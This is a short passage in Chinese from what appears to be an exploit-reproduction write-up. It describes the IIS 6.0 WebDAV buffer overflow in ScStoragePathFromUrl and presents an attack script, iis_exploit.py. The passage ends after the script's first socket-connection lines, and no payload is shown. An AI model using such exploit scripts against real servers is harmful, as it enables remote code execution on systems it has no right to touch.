漏洞复现 此漏洞由于WebDAV服务的ScStoragePathFromUrl函数存在缓存区溢出漏洞攻击者可以构造恶意请求达到任意代码执行,所以IIS6.0需要开启WebDAV服务才可以成功利用 iis_exploit.py攻击脚本代码如下: import socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(('127.0.0.1'